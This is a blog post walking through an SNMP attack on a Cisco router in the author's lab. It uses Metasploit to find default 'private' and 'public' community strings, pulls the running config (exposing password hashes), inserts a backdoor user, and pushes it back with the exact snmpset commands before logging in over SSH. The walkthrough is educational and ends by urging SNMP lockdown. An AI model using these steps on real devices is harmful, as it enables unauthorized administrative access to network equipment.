Breaking In – Fun with SNMP

Standard

Well as luck will have it I won one of those CCNA CyberOps scholarships and it starts….September…of next year…thanks Cisco! So since I haven’t managed to publish anything in a while, here is a entry I did for Reddit’s CCNA sub.


People have been talking a fair bit because of the whole scholarship thing but I figured it would be a nice change of pace to play around with a cyber ops topic, exploiting SNMP 🙂

The standard security disclaimer applies here, if you are going to follow along with these types of posts then make sure you are only doing them against your own lab equipment.

Let’s say we want to log onto a router but we seem to have misplaced our pesky username and password but we know SNMP is setup on the router and we haven’t gotten around to securing it yet.

We’ll simple boot up Metasploit in Kali and see what options we have for SNMP.

     ,           ,
    /             \
   ((__---,,,---__))
      (_) O O (_)_________
         \ _ /            |\
          o_o \   M S F   | \
               \   _____  |  *
                |||   WW|||
                |||     |||


Tired of typing 'set RHOSTS'? Click & pwn with Metasploit Pro
Learn more on http://rapid7.com/metasploit

       =[ metasploit v4.13.2-dev                          ]
+ -- --=[ 1605 exploits - 913 auxiliary - 275 post        ]
+ -- --=[ 458 payloads - 39 encoders - 9 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > search snmp

Matching Modules
================

   Name                                                 Disclosure Date  Rank       Description
   ----                                                 ---------------  ----       -----------
   auxiliary/admin/cisco/cisco_asa_extrabacon                            normal     Cisco ASA Authentication Bypass (EXTRABACON)
   auxiliary/scanner/misc/oki_scanner                                    normal     OKI Printer Default Login Credential Scanner
   auxiliary/scanner/snmp/aix_version                                    normal     AIX SNMP Scanner Auxiliary Module
   auxiliary/scanner/snmp/arris_dg950                                    normal     Arris DG950A Cable Modem Wifi Enumeration
   auxiliary/scanner/snmp/brocade_enumhash                               normal     Brocade Password Hash Enumeration
   auxiliary/scanner/snmp/cisco_config_tftp                              normal     Cisco IOS SNMP Configuration Grabber (TFTP)
   auxiliary/scanner/snmp/cisco_upload_file                              normal     Cisco IOS SNMP File Upload (TFTP)
   auxiliary/scanner/snmp/netopia_enum                                   normal     Netopia 3347 Cable Modem Wifi Enumeration
   auxiliary/scanner/snmp/sbg6580_enum                                   normal     ARRIS / Motorola SBG6580 Cable Modem SNMP Enumeration Module
   auxiliary/scanner/snmp/snmp_enum                                      normal     SNMP Enumeration Module
   auxiliary/scanner/snmp/snmp_enum_hp_laserjet                          normal     HP LaserJet Printer SNMP Enumeration
   auxiliary/scanner/snmp/snmp_enumshares                                normal     SNMP Windows SMB Share Enumeration
   auxiliary/scanner/snmp/snmp_enumusers                                 normal     SNMP Windows Username Enumeration
   auxiliary/scanner/snmp/snmp_login                                     normal     SNMP Community Login Scanner
   auxiliary/scanner/snmp/snmp_set                                       normal     SNMP Set Module
   auxiliary/scanner/snmp/ubee_ddw3611                                   normal     Ubee DDW3611b Cable Modem Wifi Enumeration
   auxiliary/scanner/snmp/xerox_workcentre_enumusers                     normal     Xerox WorkCentre User Enumeration (SNMP)
   exploit/multi/http/hp_sys_mgmt_exec                  2013-06-11       excellent  HP System Management Homepage JustGetSNMPQueue Command Injection
   exploit/windows/ftp/oracle9i_xdb_ftp_unlock          2003-08-18       great      Oracle 9i XDB FTP UNLOCK Overflow (win32)
   exploit/windows/http/hp_nnm_ovwebsnmpsrv_main        2010-06-16       great      HP OpenView Network Node Manager ovwebsnmpsrv.exe main Buffer Overflow
   exploit/windows/http/hp_nnm_ovwebsnmpsrv_ovutil      2010-06-16       great      HP OpenView Network Node Manager ovwebsnmpsrv.exe ovutil Buffer Overflow
   exploit/windows/http/hp_nnm_ovwebsnmpsrv_uro         2010-06-08       great      HP OpenView Network Node Manager ovwebsnmpsrv.exe Unrecognized Option Buffer Overflow
   exploit/windows/http/hp_nnm_snmp                     2009-12-09       great      HP OpenView Network Node Manager Snmp.exe CGI Buffer Overflow
   exploit/windows/http/hp_nnm_snmpviewer_actapp        2010-05-11       great      HP OpenView Network Node Manager snmpviewer.exe Buffer Overflow
   exploit/windows/scada/sunway_force_control_netdbsrv  2011-09-22       great      Sunway Forcecontrol SNMP NetDBServer.exe Opcode 0x57
   post/windows/gather/enum_snmp                                         normal     Windows Gather SNMP Settings Enumeration (Registry)

We’ll use the SNMP login to sweep our subnet to see if a common SNMP community is configured on the router.

msf > use auxiliary/scanner/snmp/snmp_login 
msf auxiliary(snmp_login) > show options

Module options (auxiliary/scanner/snmp/snmp_login):

   Name              Current Setting                                                       Required  Description
   ----              ---------------                                                       --------  -----------
   BLANK_PASSWORDS   false                                                                 no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                                                                     yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false                                                                 no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false                                                                 no        Add all passwords in the current database to the list
   DB_ALL_USERS      false                                                                 no        Add all users in the current database to the list
   PASSWORD                                                                                no        The password to test
   PASS_FILE         /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt  no        File containing communities, one per line
   RHOSTS                                                                                  yes       The target address range or CIDR identifier
   RPORT             161                                                                   yes       The target port
   STOP_ON_SUCCESS   false                                                                 yes       Stop guessing when a credential works for a host
   THREADS           1                                                                     yes       The number of concurrent threads
   USER_AS_PASS      false                                                                 no        Try the username as the password for all users
   VERBOSE           true                                                                  yes       Whether to print output for all attempts
   VERSION           1                                                                     yes       The SNMP version to scan (Accepted: 1, 2c, all)

msf auxiliary(snmp_login) > set RHOST 10.10.13.1-10.10.13.254
RHOST => 10.10.13.1-10.10.13.254
msf auxiliary(snmp_login) > set THREADS 10
THREADS => 10
msf auxiliary(snmp_login) > run
[-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: RHOSTS.
msf auxiliary(snmp_login) > set RHOSTS 10.10.13.1-10.10.13.254
RHOSTS => 10.10.13.1-10.10.13.254
msf auxiliary(snmp_login) > run

[*] Scanned  27 of 254 hosts (10% complete)
[*] Scanned  51 of 254 hosts (20% complete)
[*] Scanned  77 of 254 hosts (30% complete)
[*] Scanned 103 of 254 hosts (40% complete)
[*] Scanned 127 of 254 hosts (50% complete)
[*] Scanned 153 of 254 hosts (60% complete)
[+] 10.10.13.160:161 - LOGIN SUCCESSFUL: private (Access level: read-write); Proof (sysDescr.0): Cisco IOS Software, C5921 Software (C5921_I86-UNIVERSALK9-M), Version 15.5(2)T, RELEASE SOFTWARE (fc1)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2015 by Cisco Systems, Inc.
Compiled Wed 25-Mar-15 15:49 by prod_rel_team
[+] 10.10.13.160:161 - LOGIN SUCCESSFUL: public (Access level: read-only); Proof (sysDescr.0): Cisco IOS Software, C5921 Software (C5921_I86-UNIVERSALK9-M), Version 15.5(2)T, RELEASE SOFTWARE (fc1)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2015 by Cisco Systems, Inc.
Compiled Wed 25-Mar-15 15:49 by prod_rel_team
[*] Scanned 178 of 254 hosts (70% complete)
[*] Scanned 204 of 254 hosts (80% complete)
[*] Scanned 229 of 254 hosts (90% complete)
[*] Scanned 254 of 254 hosts (100% complete)
[*] Auxiliary module execution completed

Looks like our router is using public for read-only and private for read-write!

If we need a reminder of what is setup on the router we can use the emuneration option

msf > use auxiliary/scanner/snmp/snmp_enum
msf auxiliary(snmp_enum) > show options

Module options (auxiliary/scanner/snmp/snmp_enum):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   COMMUNITY  public           yes       SNMP Community String
   RETRIES    1                yes       SNMP Retries
   RHOSTS                      yes       The target address range or CIDR identifier
   RPORT      161              yes       The target port
   THREADS    1                yes       The number of concurrent threads
   TIMEOUT    1                yes       SNMP Timeout
   VERSION    1                yes       SNMP Version <1/2c>

msf auxiliary(snmp_enum) > set COMMUNITY private
COMMUNITY => private
msf auxiliary(snmp_enum) > set RHOSTS 10.10.13.160
RHOSTS => 10.10.13.160
msf auxiliary(snmp_enum) > run

[+] 10.10.13.160, Connected.

[*] System information:

Host IP                       : 10.10.13.160
Hostname                      : Hub-RTR01.testlab.com
Description                   : Cisco IOS Software, C5921 Software (C5921_I86-UNIVERSALK9-M), Version 15.5(2)T, RELEASE SOFTWARE (fc1)  Technical Support: http://www.cisco.com/techsupport  Copyright (c) 1986-2015 by Cisco Systems, Inc.  Compiled Wed 25-Mar-15 15:49 by prod_rel_team
Contact                       : -
Location                      : -
Uptime snmp                   : -
Uptime system                 : 25 days, 01:56:55.86
System date                   : -

[*] Network information:

IP forwarding enabled         : yes
Default TTL                   : 255
TCP segments received         : 20033
TCP segments sent             : 11831
TCP segments retrans          : 58
Input datagrams               : 8124605
Delivered datagrams           : 5076717
Output datagrams              : 3394103

[*] Network interfaces:

Interface                     : [ up ] Ethernet0/0
Id                            : 1
Mac Address                   : 00:50:56:9e:7e:bb
Type                          : ethernet-csmacd
Speed                         : 1000 Mbps
MTU                           : 1500
In octets                     : 4012233263
Out octets                    : 657677202

Interface                     : [ up ] Ethernet0/1
Id                            : 2
Mac Address                   : 00:50:56:9e:02:74
Type                          : ethernet-csmacd
Speed                         : 1000 Mbps
MTU                           : 1500
In octets                     : 402191186
Out octets                    : 201354514

Interface                     : [ up ] Ethernet0/2
Id                            : 3
Mac Address                   : 00:50:56:9e:66:a1
Type                          : ethernet-csmacd
Speed                         : 1000 Mbps
MTU                           : 1500
In octets                     : 553699138
Out octets                    : 431806330

Interface                     : [ up ] Ethernet0/3
Id                            : 4
Mac Address                   : 00:50:56:9e:22:dc
Type                          : ethernet-csmacd
Speed                         : 1000 Mbps
MTU                           : 1500
In octets                     : 155121906
Out octets                    : 72129208

Interface                     : [ up ] Ethernet1/0
Id                            : 5
Mac Address                   : 00:50:56:9e:01:7d
Type                          : ethernet-csmacd
Speed                         : 1000 Mbps
MTU                           : 1500
In octets                     : 16356648
Out octets                    : 1864788211

Interface                     : [ down ] Ethernet1/1
Id                            : 6
Mac Address                   : 00:50:56:9e:7e:74
Type                          : ethernet-csmacd
Speed                         : 1000 Mbps
MTU                           : 1500
In octets                     : 0
Out octets                    : 0

Interface                     : [ down ] Ethernet1/2
Id                            : 7
Mac Address                   : 00:50:56:9e:20:ba
Type                          : ethernet-csmacd
Speed                         : 1000 Mbps
MTU                           : 1500
In octets                     : 0
Out octets                    : 0

Interface                     : [ down ] Ethernet1/3
Id                            : 8
Mac Address                   : 00:50:56:9e:16:dd
Type                          : ethernet-csmacd
Speed                         : 1000 Mbps
MTU                           : 1500
In octets                     : 0
Out octets                    : 0

Interface                     : [ up ] VoIP-Null0
Id                            : 9
Mac Address                   : :::::
Type                          : other
Speed                         : 4294 Mbps
MTU                           : 1500
In octets                     : 0
Out octets                    : 0

Interface                     : [ up ] Null0
Id                            : 10
Mac Address                   : :::::
Type                          : other
Speed                         : 4294 Mbps
MTU                           : 1500
In octets                     : 0
Out octets                    : 0

Interface                     : [ up ] Loopback0
Id                            : 11
Mac Address                   : :::::
Type                          : softwareLoopback
Speed                         : 4294 Mbps
MTU                           : 1514
In octets                     : 0
Out octets                    : 8568300

Interface                     : [ up ] Tunnel0
Id                            : 12
Mac Address                   : :::::
Type                          : unknown
Speed                         : 0 Mbps
MTU                           : 17912
In octets                     : 0
Out octets                    : 2132851

Interface                     : [ up ] Tunnel1
Id                            : 13
Mac Address                   : :::::
Type                          : unknown
Speed                         : 0 Mbps
MTU                           : 17920
In octets                     : 0
Out octets                    : 0


[*] Network IP:

Id                  IP Address          Netmask             Broadcast           
5                   10.1.2.2            255.255.255.0       1                   
4                   10.1.103.1          255.255.255.0       1                   
2                   10.10.12.1          255.255.255.0       1                   
1                   10.10.13.160        255.255.255.0       1                   
3                   10.10.14.1          255.255.255.0       1                   
11                  10.10.255.254       255.255.255.255     1                   

[*] TCP connections and listening ports:

Local address       Local port          Remote address      Remote port         State               
10.10.13.160        22                  10.10.13.13         16761               established         

[*] Listening UDP ports:

Local address       Local port          
10.10.13.160        67                  
10.10.13.160        161                 
10.10.13.160        162                 
10.10.13.160        18999               
10.10.13.160        53157               
224.0.1.40          496                 


[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(snmp_enum) > back

Next we’ll want to download the running configuration on the router so we can add our useraccount by using the fancy TFTP function, Metasploit isn’t really doing anything fancy aside from the SNMP sweep, it is just grouping together some SNMP get commands for us.

msf > use auxiliary/scanner/snmp/cisco_config_tftp
msf auxiliary(cisco_config_tftp) > show options

Module options (auxiliary/scanner/snmp/cisco_config_tftp):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   COMMUNITY  public           yes       SNMP Community String
   LHOST                       no        The IP address of the system running this module
   OUTPUTDIR                   no        The directory where we should save the configuration files (disabled by default)
   RETRIES    1                yes       SNMP Retries
   RHOSTS                      yes       The target address range or CIDR identifier
   RPORT      161              yes       The target port
   SOURCE     4                yes       Grab the startup (3) or running (4) configuration (Accepted: 3, 4)
   THREADS    1                yes       The number of concurrent threads
   TIMEOUT    1                yes       SNMP Timeout
   VERSION    1                yes       SNMP Version <1/2c>

msf auxiliary(cisco_config_tftp) > set COMMUNITY private
COMMUNITY => private
msf auxiliary(cisco_config_tftp) > set LHOST 10.10.13.114
LHOST => 10.10.13.114
msf auxiliary(cisco_config_tftp) > set RHOST 10.10.13.160
RHOST => 10.10.13.160
msf auxiliary(cisco_config_tftp) > run
[-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: RHOSTS.
msf auxiliary(cisco_config_tftp) > set RHOSTS 10.10.13.160
RHOSTS => 10.10.13.160
msf auxiliary(cisco_config_tftp) > run

[*] Starting TFTP server...
[*] Scanning for vulnerable targets...
[*] Trying to acquire configuration from 10.10.13.160...
[*] Scanned 1 of 1 hosts (100% complete)
[*] Providing some time for transfers to complete...
[*] Incoming file from 10.10.13.160 - 10.10.13.160.txt 4945 bytes
[+] 10.10.13.160:161 MD5 Encrypted Enable Password: $1$c7e4$q9aUD24ObbOxNsyEHZTHp1
[+] 10.10.13.160:161 Username 'admin' with MD5 Encrypted Password: $1$BhP8$RRafvJYVHZancM6sDF5vh0
[+] 10.10.13.160:161 SNMP Community (RO): public
[+] 10.10.13.160:161 SNMP Community (RW): private
[*] Shutting down the TFTP service...
[*] Auxiliary module execution completed
msf auxiliary(cisco_config_tftp) > 
msf auxiliary(cisco_config_tftp) > 
msf auxiliary(cisco_config_tftp) > back
msf > use auxiliary/scanner/snmp/cisco_config_tftp
msf auxiliary(cisco_config_tftp) > show options

Module options (auxiliary/scanner/snmp/cisco_config_tftp):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   COMMUNITY  private          yes       SNMP Community String
   LHOST      10.10.13.114     no        The IP address of the system running this module
   OUTPUTDIR                   no        The directory where we should save the configuration files (disabled by default)
   RETRIES    1                yes       SNMP Retries
   RHOSTS     10.10.13.160     yes       The target address range or CIDR identifier
   RPORT      161              yes       The target port
   SOURCE     4                yes       Grab the startup (3) or running (4) configuration (Accepted: 3, 4)
   THREADS    1                yes       The number of concurrent threads
   TIMEOUT    1                yes       SNMP Timeout
   VERSION    1                yes       SNMP Version <1/2c>

msf auxiliary(cisco_config_tftp) > set LHOST 10.10.13.114
LHOST => 10.10.13.114
msf auxiliary(cisco_config_tftp) > set RHOSTS 10.10.13.160
RHOSTS => 10.10.13.160
msf auxiliary(cisco_config_tftp) > set COMMUNITY private
COMMUNITY => private
msf auxiliary(cisco_config_tftp) > set OUTDIR /var/tmp/
OUTDIR => /var/tmp/
msf auxiliary(cisco_config_tftp) > set OUTPUTDIR /var/tmp/
OUTPUTDIR => /var/tmp/
msf auxiliary(cisco_config_tftp) > run

[*] Starting TFTP server...
[*] Scanning for vulnerable targets...
[*] Trying to acquire configuration from 10.10.13.160...
[*] Scanned 1 of 1 hosts (100% complete)
[*] Providing some time for transfers to complete...
[*] Incoming file from 10.10.13.160 - 10.10.13.160.txt 4945 bytes
[*] Saved configuration file to /var/tmp/10.10.13.160.txt
[+] 10.10.13.160:161 MD5 Encrypted Enable Password: $1$c7e4$q9aUD24ObbOxNsyEHZTHp1
[+] 10.10.13.160:161 Username 'admin' with MD5 Encrypted Password: $1$BhP8$RRafvJYVHZancM6sDF5vh0
[+] 10.10.13.160:161 SNMP Community (RO): public
[+] 10.10.13.160:161 SNMP Community (RW): private
[*] Shutting down the TFTP service...
[*] Auxiliary module execution completed

At this point we have the running config downloaded to /var/tmp/.txt so lets add our username to the file. I’ll use AWK but using a text editor is perfectly fine if a bit boring. Because we’re are doing a merge with the running config we don’t actually need to upload the entire config file, we could have also just uploaded the exact commands we wanted.

root@kail01:~# gawk -i inplace '/username/{print "username meowcat password meowmeow"}1' /var/tmp/10.10.13.160.txt && cat /var/tmp/10.10.13.160.txt | grep username
username meowcat password meowmeow
username admin secret 5 $1$BhP8$RRafvJYVHZancM6sDF5vh0

Lastly we will use SNMP set to upload the file into running configuration, I won’t go into detail since this is mostly just a primer but basically each line adds pushes each part of the `copy tftp://10.10.13.114/cisco.txt running’ command to the router. Note I renamed the text file to cisco.txt for clarify.

snmpset -c private -v 2c 10.10.13.160 1.3.6.1.4.1.9.9.96.1.1.1.1.2.666 i 1
snmpset -c private -v 2c 10.10.13.160 1.3.6.1.4.1.9.9.96.1.1.1.1.3.666 i 1
snmpset -c private -v 2c 10.10.13.160 1.3.6.1.4.1.9.9.96.1.1.1.1.4.666 i 4
snmpset -c private -v 2c 10.10.13.160 1.3.6.1.4.1.9.9.96.1.1.1.1.5.666 a 10.10.13.114
snmpset -c private -v 2c 10.10.13.160 1.3.6.1.4.1.9.9.96.1.1.1.1.6.666 s cisco.txt
snmpset -c private -v 2c 10.10.13.160 1.3.6.1.4.1.9.9.96.1.1.1.1.14.666 i 1

And now we can SSH with our new account

tpt@HOME01:/mnt/c$ ssh meowcat@10.10.13.160
The authenticity of host '10.10.13.160 (10.10.13.160)' can't be established.
RSA key fingerprint is d4:22:5f:6f:0b:cd:24:0c:fd:9b:22:7c:82:7e:c6:a0.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.10.13.160' (RSA) to the list of known hosts.
Password:

Hub-RTR02>

This is why we lock down SNMP as much as possible 🙂

Beyond security you might find yourself using a similar method (without the metasploit) to do things like get around locking yourself out of a router or clearing lines when all your VTYs are used up. Now that Windows supports bash it is also really easy to use SNMP tools while connected to various VPNs.

Hooray for SNMP!

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s